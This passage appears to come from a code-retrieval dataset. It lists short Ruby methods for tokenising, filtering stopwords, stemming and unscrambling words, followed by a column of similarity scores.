"def words( strict = false )\n splits = split( /\\b/ )\n splits.reject! { |w| !(w =~ /\\w/) } if strict\n splits\n end",
"def stopwords\n @stopwords ||= IO.readlines(@stopwords_file).map { |l| l.strip }\n end",
"def stopwords\n @stopwords ||= IO.readlines(@stopwords_file).map { |l| l.strip }\n end",
"def word_unscrambler(str, words)\n str = str.split('').sort.join('')\n possible = []\n words.map do |word|\n sort_word = word.split('').sort.join('')\n possible << word if word_c == str\n end\n return possible\nend",
"def remove_unwanted_duplicates word_pairs\n all_sequences = word_pairs.map{ |pair| pair.first }\n\n duplicate_seqs = identify_duplicate_sequences all_sequences\n\n word_pairs.reject do |seq, original|\n duplicate_seqs.include? seq\n end\n end",
"def word_unscrambler(str, words)\n return words.keep_if {|word| word.chars.sort == str.chars.sort}\nend",
"def wordlist\n unless @whitelist.nil?\n @whitelist\n else\n @blacklist\n end\n end",
"def highlight_blacklisted_words\n params[:comment_text]&.gsub(/(#{Regexp.union(BLACKLISTED_WORDS).source})/i) { |s| \"<<#{s}>>\" }\n end",
"def remove_vowels(array_of_words)\n array_of_words.map do |word|\n word.delete(\"aeiouAEIOU\")\n end\nend",
"def dedupe(words)\n words.select do |word|\n word.downcase != @word.downcase \n end\n end",
"def interesting_words(sentence, stop_word_array=['a', 'the', 'on'])\n # TODO\nend",
"def all_words\n result = []\n tagged_words.each do |word|\n result << word[0] unless is_punctuation([ word[0], word[1] ])\n end\n result\n end",
"def non_opt_words(current)\n output = []\n (0..(current.length-1)).each do |index|\n ('a'..'z').each do |let|\n test_word = current.clone\n test_word[index] = let\n output << test_word if legal_word?(test_word)\n end\n end\n output.uniq\nend",
"def split_words\n @split_words ||= words\n .downcase\n .split\n .collect{|w| w.gsub /\\W/, ''}\n end",
"def remove_vowels(words)\n words.map { |word| word.delete \"aeiouAEIOU\" }\nend",
"def remove_w_words(sentence)\n \nend",
"def remove_affects_with_keywords(keywords)\n keywords\n list = @affects.select{ |a| a.fuzzy_match( keywords ) }\n list.each do |affect|\n affect.clear(false)\n end\n return\n end",
"def tokenize_string(str)\n str.downcase.split(/\\b+/).map do |word|\n word.gsub(/[^\\w ]/,\"\")\n end.reject{|word| word.size < 2 }\nend",
"def remove_punc(text)\n word_list = []\n\n\n # Checking for correct encoding and reencoding the string if necessary\n if ! text.valid_encoding?\n text = text.encode(\"UTF-16be\", :invalid=>:replace, :replace=>\"?\").encode('UTF-8')\n end\n \n # Removing puctuation\n words = text.split(/[ ,;{}`~!@#$%^&*<>.:\"'|?\\\\()_+=\\/\\[\\]\\-]/)\n \n # Looping though the list, checking for valid words, and changing their case\n for word in words\n word = word[/\\w*/]\n word.downcase!\n word_list.push(word)\n end\n\n # Deleting blanks\n word_list.delete(\"\")\n\n return word_list\n\nend",
"def subtract_term_list_from_term_list(tl_left, tl_right)\n\tadd_term_and_term_list(flip_sign_on_term_list(tl_left), tl_right)\nend",
"def remove_search_tags(search_tags, resource_tags)\n tags_to_remove = search_tags.split()\n tags_to_response = resource_tags.split()-tags_to_remove\n tags_to_response = resource_tags.split()\n tag_list = Array.new\n tags_to_response.each do |tag|\n tag_list << tag if tag.size < 25\n end\n return tag_list.join(\" \")\n end",
"def one_off_words(str,word_list)\n result = []\n better_list = word_list.select{|word| word.size == str.size}\n better_list.each do |word|\n i = 0\n count = 0\n while i < word.size\n count += 1 if word[i] == str[i]\n i += 1\n end\n result << word if word.size - count == 1\n end\n result\nend",
"def extract\n # create hash of words with number of their instances in tokens excluding stopwords\n words_hash = Hash.new(0)\n @tokens.each { |w| \n unless w.empty? or stop_words_for(@language)[w]\n words_hash[w] += 1 \n end\n }\n\n idfs_hash = get_idfs(words_hash.keys)\n\n # calculate tf-idf for each word into keywords array\n keywords = []\n max_num = words_hash.values.max.to_f\n words_hash.each do |word, num|\n tf = num / max_num\n idf = idfs_hash[word]\n keywords << [word, (tf * idf).round(5), idf.round(5)]\n end\n\n # return keywords sorted by rank descending\n keywords.sort_by {|word, rank, idf| -rank}\n end",
"def remove_all_with(*c)\n return nil if c.nil?\n\n if c.is_a? String\n return self.map {|x| x.include?(c) ? nil : x}.compact\n elsif c.is_a? Array\n if c == [[]] || c == []\n return self\n else\n return self.reject{|word| /[#{c.join}]/ =~ word}\n end\n end\n end",
"def to_terms\n\t\t\traise \"Document invalid.\" unless @doc\n\t\t\tterms = @doc.gsub(/[^a-z]+/u, ' ').strip.split(' ')\n\t\t\tterms.reject! do |term|\n\t\t\t\t#@@stop_words.include?(term) || term.length < 4 || term.length > 20\n ((term.length < 3 && !SHORT_WORDS.include?(term)) || term.length > 20)\n\t\t\tend\n terms.collect! {|term| term.stem}\n terms = terms.select {|term| term.length > 1}\n\t\t\tterms - STOP_WORDS\n\t\tend",
"def subtract_term_list_from_term(term_list, term)\n\tadd_term_and_term_list(term, flip_sign_on_term_list(term_list))\nend",
"def untrain(tokens, category)\n tokens = tokens.uniq if binarized\n data.decrement_examples(category)\n \n tokens.each do |token|\n if data.token_trained?(token, category)\n vocab.delete(token)\n data.remove_token_from_category(category, token)\n end\n end\n end",
"def words_with_unapproved_synonyms\n return Keyword.joins(:synonyms).where(\"synonyms.approved\" => false).all\n end",
"def prune_actionwords\n puts \"Pruning actionwords\" if @options.verbose\n prune_actionwords_by_css(@@scenario_css, @@actionword_css)\n end",
"def unscramble(scramble)\n $word_list.select { |a| a.chars.sort == scramble.chars.sort }\nend",
"def match(w_array)\n w_array.delete_if {|w| w.split(\"\").sort != word.split(\"\").sort}\n end",
"def process_list(word_list)\n word_set = {}\n output = []\n\n word_list.each_with_index do |word, index|\n hash = hash_word(word)\n word_set[hash] ||= []\n word_set[hash] << wrap_word_with_index(word, index)\n\n if word_set[hash].length >= 2\n word_set[hash].each do |word_index|\n word, i = word_index\n # Place the word in it's original index/placement of the original string\n output.insert(i, word)\n end\n end\n end\n output.compact\nend",
"def search_values_without_quotes_and_filters\n search_string.gsub(Regexp.union(FILTER_WORD_REGEX, REGEX_WORD_IN_QUOTES), '').split(' ')\n end",
"def word_list\n # Returning only the terms of each definition as an array.\n list_of_terms = @words.map do |key, definition_instance|\n definition_instance.term\n end\n end",
"def words\n reject { |arg| arg.index('-') == 0 }\n end",
"def extract_all_words(html)\n doc = Nokogiri::HTML(html)\n keywords = []\n doc.css(\"meta[name='keywords']\").each do |node|\n keywords += node['content'].gsub(/\\s+/, \" \").gsub(/[^a-zA-Z\\- ',]/, '').squeeze(\" \").split(\",\")\n end\n text = String.new\n doc.css(\"meta[name='description']\").each do |node|\n text += node['content']\n end\n \n %w(script style link meta).each do |tag|\n doc.css(tag).each { |node| node.remove }\n end\n\n w = []\n doc.traverse do |node|\n if node.text? then\n w << node.content + \" \"\n end\n end\n text += w.join.gsub(/\\s+/, \" \").gsub(/[^a-zA-Z\\- ']/, '').squeeze(\" \")\n words = (text.downcase.split - STOPWORDS)\n \n final = (keywords + words)\n final.map do |w|\n w.stem\n end\n end",
"def split(text)\n text.downcase.scan(WORDS).uniq\n end",
"def real_words(permutations, wordlist)\n validwords = []\n wordlist = wordlist.to_set\n permutations.each { |x| validwords << x if wordlist.include?(x) }\n validwords\nend",
"def tokenize\n return [] if unencoded_text.blank?\n # kill off all punctuation except [stuff]'s or [stuff]'t\n # this includes hyphens (words are split)\n str = unencoded_text.\n downcase.\n gsub(/[^a-zA-Z0-9\\']+/, ' ').\n gsub(/(\\w)\\'([st])\\b/, '\\1!\\2').gsub(/\\'/, ' ').gsub(/!/, \"'\")\n # Busticate at whitespace\n words = str.strip.split(/\\s+/)\n words.reject!{|w| w.length < 3 }\n words.map!{|w| Wukong::encode_str(w) }\n end",
"def blacklist\n Regexp.new \"(#{ BLACKLIST.join '|' })\"\n end",
"def backwards_wording(words)\n words.select { |word| word.size >= 5 }.map { |word| word.reverse }\n end",
"def keyword_tweets\n\t\ttweets.select{|t| !t.contextual}\n\tend",
"def subtract_term_from_term_list(term, term_list)\n\tadd_term_and_term_list(flip_sign_on_term(term), term_list)\nend",
"def words\n terms.collect { |t| t.word }\n end",
"def keep_only_words_that_match(hangman_pattern)\n pattern = Regexp.new('^' + hangman_pattern.gsub(/-/,'.') + '$')\n\n change_wordlist(@words.select { |word,letters| word.word =~ pattern })\n end",
"def score(literatureText, wordsToExclude)\n excluded_word_hash = Hash.new(0)\n wordsToExclude.each do |key| \n excluded_word_hash[key] = 1\n end\n word_list = Array.new\n \n \n freq_hash, max = convert_to_freq_hash(literatureText.split(\" \"), excluded_word_hash) \n \n freq_hash.each do |k, v| \n word_list << k if v == max \n end\n \n word_list\nend",
"def word_unscrambler(word, dictionary)\nresult = []\ndictionary.each do |entry|\n\tif entry.split(\"\").sort.join(\"\") == word.split(\"\").sort.join(\"\")\n\t\tresult << entry\n\tend\nend\nresult \nend",
"def word_unscrambler(str, words)\n str_letters = str.split(\"\").sort\n\n res = []\n words.each do |word|\n word_letters = word.split(\"\").sort\n res << word if str_letters == word_letters\n end\n\n res\nend",
"def remove_unused_actionwords(actionword_css, used)\n puts \"Pruning unused actionwords\" if @options.verbose\n @xml.css(actionword_css).each { |actionword|\n name = actionword_name(actionword)\n next if used.include?(name)\n puts \"Removing actionword #{name}\" if @options.verbose\n actionword.remove\n }\n end",
"def words\n @words ||= text.split(/\\s/).delete_if { |word| word.length.zero? }\n end",
"def words\n scrabble_words = File.readlines(\"words.txt\")\n scrabble_words.map { |x| x.delete(\"\\n\") }\nend",
"def keywords(limit = 20)\n @keywords ||= {}\n @keywords[limit] ||= begin\n list = []\n count = 0\n _stopwords = Vidibus::Words.stopwords(*locales)\n for word in sort\n clean = word.permalink.gsub('-','')\n unless _stopwords.include?(clean)\n list << word\n count += 1\n break if count >= limit\n end\n end\n list\n end\n end",
"def mltify_text text\n \n coder = HTMLEntities.new\n text = coder.decode text\n text = sanitize( text, okTags = \"\" )\n text = coder.encode text\n words = text.downcase.gsub( /[^A-za-z0-9\\s'\\-#]/, \" \" ).split( /\\s/ )\n \n final_words = []\n words.each do |w|\n unless stop_words.include? w\n final_words << w\n end\n end\n RAILS_DEFAULT_LOGGER.info final_words.join( ' ' ).squish\n final_words.join( ' ' ).squish\n end",
"def remove_nils_and_false_from_array(array)\n array.reject!{ | word | word == nil || word == false }\nend",
"def my_array_deletion_method(source, thing_to_delete)\n\tsource.each do |word| if word.to_s.split(\"\").include? thing_to_delete\n\t\tsource.delete word\n\tend\nend\n\t source \nend",
"def stop_words\n return {} if self.collection_yaml.nil?\n return self[:stop_words] unless self[:stop_words].nil?\n \n self[:stop_words] = Treat.languages[self.treat_collection.language].stop_words\n self.save!\n \n self[:stop_words]\n end",
"def neutralize(sentence)\n words = sentence.split(' ')\n unchanged_words = sentence.split(' ')\n unchanged_words.each do |word|\n words.delete(word) if negative?(word)\n end\n\n words.join(' ')\nend",
"def words\n word_list = @lines.map do |line|\n line.split(\" \")\n end\n word_list.uniq\n end",
"def untrain(words)\n decreases = @categories.filter(@name).eject(words)\n @size -= decreases[@name]\n end",
"def _excluded_words\n Lexhub.configuration.excluded_words\n end",
"def prep_text_for_match_query(text,exclude_dblquote=false,remove_weak_terms=true)\r\n result = text.dup\r\n result.downcase! # downcase for stop_words removal\r\n result.gsub!(\"'s\",'')\r\n remove_punctuation_proper!(result,exclude_dblquote)\r\n # result.gsub!(/([^\\s]+)/) { |word|\r\n # weak_term?(word) ? '' : word\r\n # } if remove_weak_terms\r\n # result\r\n # #!? check terms as adverbs?\r\n words = result.split(/\\W/)\r\n if remove_weak_terms\r\n words = words.select {|w| !weak_term?(w) }\r\n end\r\n words.compact!\r\n words.join(\" \")\r\n end",
"def remove_sport\n 'basketball|baseball|softball|football|womens basketball'\n end"
] | [
"0.7914966",
"0.78771454",
"0.73791426",
"0.7214798",
"0.6798927",
"0.679369",
"0.6740443",
"0.6705289",
"0.66708285",
"0.6579485",
"0.64807314",
"0.6468068",
"0.644567",
"0.6221474",
"0.61697197",
"0.61367285",
"0.6133781",
"0.6107613",
"0.6104376",
"0.60622966",
"0.59931505",
"0.5978716",
"0.59767294",
"0.5958919",
"0.5913803",
"0.5881073",
"0.58381695",
"0.57916653",
"0.57864904",
"0.5777404",
"0.57696617",
"0.5768698",
"0.5765198",
"0.5747045",
"0.57293797",
"0.5709946",
"0.5700082",
"0.56654084",
"0.5654245",
"0.5618494",
"0.56154764",
"0.55808264",
"0.55804414",
"0.5574399",
"0.5561488",
"0.5538138",
"0.553141",
"0.5513802",
"0.551228",
"0.5507822",
"0.54987526",
"0.5496012",
"0.5480337",
"0.5445581",
"0.5435588",
"0.54272485",
"0.54248416",
"0.5423536",
"0.54154015",
"0.53974706",
"0.536563",
"0.5363187",
"0.53564847",
"0.53555065",
"0.53502804",
"0.5323779",
"0.5308607",
"0.5302967",
"0.5298905",
"0.5297966",
"0.5294196",
"0.5293045",
"0.5287165",
"0.5285448",
"0.528474",
"0.5271912",
"0.52679145",
"0.52575517",
"0.52525324",
"0.52506095",
"0.5241789",
"0.5235107",
"0.5228089",
"0.52256405",
"0.5204138",
"0.51837724",
"0.51760703",
"0.5175881",
"0.5174751",
"0.5165156",
"0.5158484",
"0.5157518",
"0.51554674",
"0.51446325",
"0.51386446",
"0.5133953",
"0.51146346",
"0.5090772",
"0.5088058",
"0.508548"
] | 0.84956324 | 0 |
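Many of the negatives above share the same tokenize-then-filter shape: split on non-word characters, then drop blanks, short tokens, and stop words. A minimal self-contained sketch of that shared pattern, in Ruby like the snippets themselves; the STOP_WORDS list and method name are illustrative and not taken from any one snippet:

STOP_WORDS = %w[a an and the of to].freeze

def tokenize_and_filter(text)
  text.downcase
      .split(/[^a-z0-9']+/) # split on any run of non-word characters
      .reject { |w| w.empty? || w.length < 3 || STOP_WORDS.include?(w) }
end

tokenize_and_filter("The quick, brown fox!") # => ["quick", "brown", "fox"]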
function that takes a list of tokens, runs a stemmer on each token, and then returns a new list with the stems | def stem_tokens(tokens)
stem_list = []
# Looping through the list and finding the stem word for each word
for word in tokens
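    # Keep only the leading run of word characters, dropping any stray punctuation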
word = word[/\w*/]
s = word.stem
stem_list.push(s)
end
return stem_list
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def stem_each(ary)\n ary.map { |term| @stemmer.stem(term) }\n end",
"def analyze content\n unless content.respond_to? :split\n raise ArgumentError, \"#{content.class} has no #split\"\n end\n content.split(/\\s/).map {|w| @stemmer.stem w }\n end",
"def stem(word)\n stems = []\n\n FFI::MemoryPointer.new(:pointer) do |output|\n count = Hunspell.Hunspell_stem(self,output,word.to_s)\n ptr = output.get_pointer(0)\n\n if count > 0\n stems = ptr.get_array_of_string(0,count)\n end\n end\n\n return stems.map { |word| force_encoding(word) }\n end",
"def stem(data)\n if data\n words = data.split(/[+,_]|%20/) # split on '+', '_', or '%20'\n tokens = []\n\n words.each do |word|\n tokens.push(Lingua.stemmer(word, :language => \"en\"))\n end\n\n tokens.join(\",\")\n else\n \"Error: need input\"\n end\n end",
"def stem_token_count\n list = get_all_tokens_count.map! {|e| e[1] }\n return Stat.stem(list)\n end",
"def test_stemming\n data = []\n File.foreach(File.expand_path(File.dirname(__FILE__))+\"/porter2_testdata.txt\") do |line| \n data << line.chomp.split(/ /).reject { |e| e.empty? }\n end\n\n data.each do |input|\n word, stem = input\n assert_equal stem, PorterStemmer::Porter2.stem(word)\n end\n end",
"def test_stemming\n data = []\n current_dir = File.expand_path(File.dirname(__FILE__))\n voc_file = File.new(current_dir+\"/porter1_vocabulary.txt\", \"r\")\n out_file = File.new(current_dir+\"/porter1_output.txt\", \"r\")\n while ((word = voc_file.gets) && (stem = out_file.gets)) \n data << [word.chop, stem.chop]\n end\n voc_file.close\n out_file.close\n\n data.each do |input|\n word, stem = input\n assert_equal stem, PorterStemmer::Porter1.stem(word)\n end\n end",
"def stem_token_deviance( filter_count=nil )\n list = get_all_tokens_deviance( filter_count ).map! {|e| e[1] }\n return Stat.stem( Stat.recode_float(list, [0.0..1.0,1.0..2.0,2.0..3.0,3.0..4.0,4.0..5.0,5.0..6.0,6.0..7.0] ) )\n\n\t#list = get_all_tokens_deviance.map! {|e| e[1] }\n\t#return Stat.stem( Stat.recode_float(list, [0.0..1.0,1.0..2.0,2.0..3.0,3.0..4.0,4.0..5.0,5.0..6.0,6.0..7.0] ) )\n\n end",
"def each_term\n\t\t\tself.to_terms.each do |term|\n\t\t\t\tyield term.stem\n\t\t\tend\n\t\tend",
"def tokenize\n @s.reset\n\n tokens = []\n\n while token = consume\n tokens << token\n end\n\n tokens\n end",
"def tokenize\n @s.reset\n\n tokens = []\n\n while token = consume\n tokens << token\n end\n\n tokens\n end",
"def get_words\n @sentences.each_index do |i|\n s = @sentences[i]\n words = s.split(' ')\n words.each do |w|\n word = w.gsub(WORD_SANITIZE, '').downcase\n if belongs_to_known_abbreviations? word\n add_word_to_result(word, i)\n else\n add_word_to_result(word.gsub(DOT_SANITIZE, ''), i)\n end\n end\n end\n end",
"def tokenize\n \n end",
"def tokenize ; end",
"def tokenize ; end",
"def tokenize; end",
"def tokenize; end",
"def strip_to_stems\n str = self.sanitize_tags\n terms_a = str.gsub(/[^a-z]+/u, ' ').strip.split(' ')\n terms = terms_a.reject do |term|\n ((term.length < 3 && !SHORT_WORDS.include?(term)) || term.length > 20)\n end\n terms.collect! {|term| term.stem}\n terms = terms.select {|term| term.length > 1}\n terms = terms - STOP_STEMS\n return terms.join(' ')\n end",
"def stem_dfs\n case @options[:stemming]\n when :stem\n {}.tap do |ret|\n @dfs.each do |k, v|\n stem = k.stem\n ret[stem] ||= 0\n ret[stem] += v\n end\n end\n when :lemma\n # This may not work without sentential context to feed to the NLP\n # engine, but it's better than not trying anything at all\n {}.tap do |ret|\n @dfs.each do |k, v|\n yml = Cheetah.run(Admin::Setting.nlp_tool_path, '-l',\n stdin: k, stdout: :capture)\n result = YAML.load(yml)\n\n lemma = result[0]\n\n ret[lemma] ||= 0\n ret[lemma] += v\n end\n end\n else\n @dfs\n end\n end",
"def consume_mentions(mentions)\n mentions.map! do |mention|\n NLP.normalize(mention)\n end\n\n mention_text = mentions.join(\"\\n\").encode('UTF-8', invalid: :replace)\n # the same as above, we just add onto our array instead of\n # overwriting it\n mass_tikify(mention_text).each do |mention|\n @mentions << mention\n end\n\n nil\n end",
"def tokenize\n return [] if unencoded_text.blank?\n # kill off all punctuation except [stuff]'s or [stuff]'t\n # this includes hyphens (words are split)\n str = unencoded_text.\n downcase.\n gsub(/[^a-zA-Z0-9\\']+/, ' ').\n gsub(/(\\w)\\'([st])\\b/, '\\1!\\2').gsub(/\\'/, ' ').gsub(/!/, \"'\")\n # Busticate at whitespace\n words = str.strip.split(/\\s+/)\n words.reject!{|w| w.length < 3 }\n words.map!{|w| Wukong::encode_str(w) }\n end",
"def make_terms(text, lang)\n if !text\n return []\n end\n \n text = clean_text(text)\n\n # Turn non-breaking spaces into spaces. This is more complex than it should be, \n # due to Ruby version and platform character encoding differences\n # In particular Windows always seems to read as IBM437 encoding\n if RUBY_VERSION < \"1.9\"\n text.gsub!(/\\302\\240/,' ') \n else\n text.gsub!(\"\\u00A0\", \" \") # turn non-breaking spaces (UTF-8) into spaces \n end\n\n text = downcase_l(text,lang)\n\n # cleanups on Cable and Warlogs data\n text.gsub!(\"&\",\"\") # data has some HTML apostrophe mess, clean it up\n text.gsub!(\"amp;\",\"\")\n text.gsub!(\"apos;\",\"'\")\n text.gsub!(\"''\",\"'\") # double '' to single '\n text.gsub!(/<[^>]*>/, '') # strip things inside HTML tags\n\n # allow only a small set of characters\n text.tr!('\"()[]:,',' ') # turn certain punctation into spaces\n text = strippunct_l(text, lang) # remove anything not in the language charset (helps with OCR junk)\n text.gsub!(/\\s\\s*/, ' ') # collapse runs of spaces into single spaces\n\n terms = text.split(' ')\n terms.map!{ |t| t.sub(/^[^a-z0-9]+/,'').sub(/[^a-z0-9]+$/,'') } # remove leading/trailing punctuation\n \n # Now scan through the term list and spit out ungrams, bigrams\n termsout = []\n \n while t = terms.shift\n \n # look for a bigram starting with t\n if terms.length && terms[0] != nil\n t2 = terms[0]\n bigram = t + \"_\" + t2\n if @bigrams.include?(bigram)\n termsout << bigram\n #puts bigram\n next\n end\n end\n \n # DISABLED stemming, for easier installation (stemmer gem not req'd) js 21/2/2012\n # no bigram here, stem the individual term, output if it's \"acceptable\"\n #if @stem_terms \n # t = t.stem\n #end\n \n if term_acceptable(t)\n termsout << t\n end\n \n end\n \n return termsout\n end",
"def convert_to tokens\r\n join( tokens.map{|t| process(t.to_s) })\r\n end",
"def bulk_tweet_shortener(tweets) \n tweets.each do |phrase|\n puts word_substituter(phrase)\n end\nend",
"def bulk_tweet_shortener(tweets_array)\n tweets_array.collect do |phrase|\n puts word_substituter(phrase)\n end \nend",
"def parse\n parse_results = []\n @words.each_index do |i|\n i.upto(@words.size - 1) do |j|\n phrase = Phrase.new(@words[i..j])\n unless phrase_has_definitely_been_checked?(phrase, @existing_article_titles)\n break unless @repository.try_this_phrase_or_longer?(phrase)\n matching_articles = @repository.find_matching_articles(phrase)\n matching_articles.each do |matching_article|\n parse_results << [phrase.to_s, matching_article]\n end\n end\n end\n end\n parse_results = clean_results(parse_results, @existing_article_titles)\n end",
"def bulk_tweet_shortener(tweets)\n tweets.each do |tweet|\n output = word_substituter(tweet)\n puts output\n end\nend",
"def bulk_tweet_shortener(tweets)\n tweets.collect do |tweet|\n puts word_substituter(tweet)\n end\nend",
"def bulk_tweet_shortener(tweets)\n # puts tweets\n tweets.each {|tweet| puts word_substituter(tweet)}\nend",
"def bulk_tweet_shortener(tweets)\n tweets.each { |x| puts word_substituter(x)}\nend",
"def tokens\n @tokens ||= Tokeniser.instance.tokenise(text)\n end",
"def bulk_tweet_shortener(tweets)\n tweets.each do |tweet|\n puts word_substituter(tweet)\n end\nend",
"def bulk_tweet_shortener(tweets)\n tweets.each do |tweet|\n puts word_substituter(tweet)\n end\nend",
"def bulk_tweet_shortener(tweets)\n tweets.each { |tweet|\n puts word_substituter(tweet)\n }\nend",
"def map_words(input)\n results = []\n input.split.each do |word|\n results << yield(word)\n end\n results\nend",
"def possible_stems(word, suffix)\n myaso.stems.select cut_stem(word, suffix)\n end",
"def bulk_tweet_shortener (tweets)\n if(tweets.size > 0)\n tweets.each do |tweet_each|\n puts word_substituter(tweet_each)\n end\n end\nend",
"def bulk_tweet_shortener(array)\t\n\t array.map {|a| puts word_substituter(a)}\nend",
"def lreduce(tokens)\n # NOTE scans from right to left\n size = tokens.size\n match = 1\n \n while match > 0 # last loop had any effect\n match = 0; k = tokens.size\n \n while k > 0\n catch :done do\n self.class.reducers.each do |tags, block|\n # not enough tokens available\n next if tokens.size - (k - 1) < tags.size\n mtokens = tokens[k-1, tags.size]\n \n # next unless all tags match\n next unless catch :fail do\n mtokens.zip(tags).each do |token,tag|\n case tag\n when Symbol, Module, Class\n throw :fail unless token.include?(tag)\n when String\n throw :fail unless token.word == tag\n when Regexp\n throw :fail unless token.word =~ tag\n when Proc\n throw :fail unless tag.call(token)\n when nil\n # matches any token\n else\n throw :fail unless token.fetch(tag.class) == tag\n end\n end\n end\n \n puts \"@#{k}: #{tags.inspect}\" if options[:verbose]\n \n object = block.call(*mtokens)\n if object.kind_of?(Token)\n # restart parsing having replaced many tokens with one\n tokens[k-1, tags.size] = object\n match += 1\n throw :done\n end\n end\n end\n \n k -= 1\n end\n \n end\n tokens\n end",
"def bulk_tweet_shortener(array)\n array.collect do |tweet|\n puts word_substituter(tweet)\n end\nend",
"def bulk_tweet_shortener(array_tweet)\n array_tweet.each do |tweet|\n puts word_substituter(tweet)\n end\nend",
"def bulk_tweet_shortener(array_of_tweets)\n array_of_tweets.each do |tweet|\n single_tweet = word_substituter(tweet)\n puts single_tweet\n end\nend",
"def word_split(phrase, list, output = nil)\n\n # Checks to see if any output has been initiated. necessary to avoid infinite recursion\n if output == nil\n output = []\n end\n\n list.each do |word|\n # If the current phrase begins with the word, we have a split point\n if phrase.start_with?(word)\n # Add the word to the output\n output.push(word)\n # Recursively call split function on the remaining portion of the phrase, passing along list and output.\n return word_split(phrase[word.length..-1], list, output)\n end\n end\n # Finally return output if no phrase.start_with?(word); returns true\n return output\nend",
"def bulk_tweet_shortener(tweet_array)\n tweet_array.each do |tweet|\n puts word_substituter(tweet)\n end\nend",
"def bulk_tweet_shortener(tweet_array)\n tweet_array.each do |tweet|\n puts word_substituter(tweet)\n end\nend",
"def tokenize\n post(\"token\")[\"token\"]\n end",
"def bulk_tweet_shortener(tweet_array)\n tweet_array.each do |tweet|\n puts word_substituter(tweet)\n # each element in tweet_array is the tweet string which\n # the word_substituter method can work on\n end\nend",
"def do_process(st)\n\n\t\teojeols = st.get_eojeols()\n\n for i in 0..(eojeols.length-1) do\n morphemes = eojeols[i].get_morphemes()\n tags = eojeols[i].get_tags()\n\n @nounMorphemes.clear\n @nounTags.clear\n\n for j in 0..(tags.length-1) do\n c = tags[i][0]\n if c == \"n\" then\n @nounMorphemes << morphemes[j]\n @nounTags << tags[j]\n elsif c == \"f\" then\n @nounMorphemes << morphemes[j]\n @nounTags << \"ncn\"\n end\n end\n\n eojeols[i].set_morphemes(@nounMorphemes)\n eojeols[i].set_tags(@nounTags)\n end\n\n st.set_eojeols(eojeols)\n\n\t\treturn st\n\tend",
"def tokens\n @tokens ||= tokenize_input\n end",
"def corpus_dfs\n stem_dfs\n end",
"def bulk_tweet_shortener(array_of_tweets)\n\tarray_of_tweets.each do |tweet|\n\t\tputs word_substituter(tweet)\n\tend\nend",
"def tokenize\n\t\tout_tokens = Array.new\n\t\t\n\t\t@token_offset = 0\n\t\tuntil @token_offset >= (self.length - 1)\n\t\t\tout_tokens << next_token\n\t\tend\n\t\t\n\t\tout_tokens.reject {|token| token.empty? }\n\tend",
"def call\n text\n .split\n .map { |token| convert_sym_to_punct(token) }\n .flat_map { |token| \n token = should_downcase(token)\n remove_symbols(token)\n }\n .flat_map { |token| token.split(Regex::COMMAS_OR_PUNCTUATION) }\n .flat_map { |token| token.split(Regex::VARIOUS) }\n .flat_map { |token| token.split(Regex::ENDS_WITH_PUNCTUATION2) }\n .flat_map { |token| split_dotted_email_or_digit(token) }\n .flat_map { |token| split_abbreviations(token) }\n .flat_map { |token| split_period_after_last_word(token) }\n .flat_map { |token| remove_slash_start_and_end(token) }\n end",
"def bulk_tweet_shortener(tweet_array)\n new_tweet = \"\"\n tweet_array.each do |string|\n new_tweet = word_substituter(string)\n puts new_tweet\n end\nend",
"def spoonerize(words)\n #...aaaaand SPOONERIZE!\nend",
"def tokenizer(aTextToParse)\n offset = -1\n tokens = aTextToParse.scan(/\\S+/).map do |word|\n term_name = Lexicon[word]\n raise StandardError, \"Word '#{word}' not found in lexicon\" if term_name.nil?\n\n pos = Rley::Lexical::Position.new(1, offset + 1)\n offset += word.length\n Rley::Lexical::Token.new(word, term_name, pos)\n end\n\n return tokens\nend",
"def tokenize(s)\nterms = s.gsub(/(\\s|\\d|\\W)+/u,' ').rstrip.strip.downcase.split(' ')\nterms.reject!{|term| @@stop_words.include?(term) || term.length < 3}\nterms\nend",
"def tokens\n @tokens ||= texts.map do |value|\n GoogleTranslateDiff::Tokenizer.tokenize(value)\n end\n end",
"def base_tokenize(text) #:nodoc:\n text.split(' ').map { |word| Token.new(word) }\n end",
"def base_tokenize(text) #:nodoc:\n text.split(' ').map { |word| Token.new(word) }\n end",
"def deflate(data, *args)\n results = data.split(/\\s+/).map do |raw_token|\n #puts \"raw_token: #{raw_token.inspect}\"\n normal_token = normalize(raw_token)\n #puts \"normal_token: #{normal_token.inspect}\"\n filtered_normal_token = filter(normal_token)\n #puts \"filtered_normal_token: #{filtered_normal_token.inspect}\"\n filtered_normal_token\n end.flatten.compact.uniq\n #puts \"results: #{results.inspect}\"\n return results\n end",
"def tokenize(list)\n result = []\n list.each_with_index do |str, i|\n newstr = str.dup\n if newstr.gsub(/\\A\\s+/, '').start_with?(@inst_entry)\n token = [:nil]\n syntax.each do |(symbol, regexp, tokenfix)|\n if mtchdata = str.match(regexp)\n token = [symbol, tokenfix.(mtchdata)]\n break\n end\n end\n else\n token = [:data, newstr]\n end\n result << { line: i, raw: str, token: token }\n end\n return result\n end",
"def each_sentence\n ARGF.each(\"\") do |paragraph|\n words = paragraph.split(\"\\n\").map {|line| line.chomp}\n yield words\n end\nend",
"def tokens(force = nil)\n data(force).map(&:token)\n end",
"def get_sentences\n # Get initial letters of sentences.\n initial_letters = @text.scan(SENTENCE_DELIMITER).map {|i| i[-1]}\n # Get sentences by splitting text with the pattern. \n # Sentences from index 1 to end are without initial letters.\n @sentences = @text.split(SENTENCE_DELIMITER)\n # Add the initial letters back to the sentences.\n (1...@sentences.length).each do |i|\n @sentences[i] = initial_letters[i - 1] + @sentences[i]\n end\n end",
"def tokenizer(aTextToParse)\n scanner = StringScanner.new(aTextToParse)\n tokens = []\n\n loop do\n scanner.skip(/\\s+/)\n curr_pos = scanner.pos\n word = scanner.scan(/\\S+/)\n break unless word\n\n term_name = Lexicon[word]\n raise StandardError, \"Word '#{word}' not found in lexicon\" if term_name.nil?\n\n pos = Rley::Lexical::Position.new(1, curr_pos + 1)\n tokens << Rley::Lexical::Token.new(word, term_name, pos)\n end\n\n return tokens\nend",
